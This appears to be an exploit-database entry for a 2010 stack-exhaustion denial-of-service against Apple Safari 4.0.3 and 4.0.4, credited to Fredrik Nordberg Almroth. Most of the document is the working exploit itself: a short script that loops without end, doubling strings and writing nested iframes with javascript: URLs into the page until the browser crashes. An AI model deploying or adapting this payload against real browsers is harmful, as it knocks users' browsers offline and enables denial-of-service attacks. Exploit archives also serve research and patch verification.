Apple Safari 4.0.3/4.0.4 - Stack Exhaustion



EKU-ID: 19618 CVE: OSVDB-ID:
Author: Fredrik Nordberg Almroth Published: 2010-04-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<script>
//Written by: Fredrik Nordberg Almroth
//URL: http://h.ackack.net/
//Affected: Safari 4.0.3 & 4.0.4 - Other versions might be vulnerable aswell.
  a="<script>var b=\"<iframe src='javascript:window.location=\"boom\"'></iframe>\";while(1){b=b+b;document.write(b);}</scr"+"ipt>";
  while(1){
    a=a+a;
    document.write(a);
  }
</script>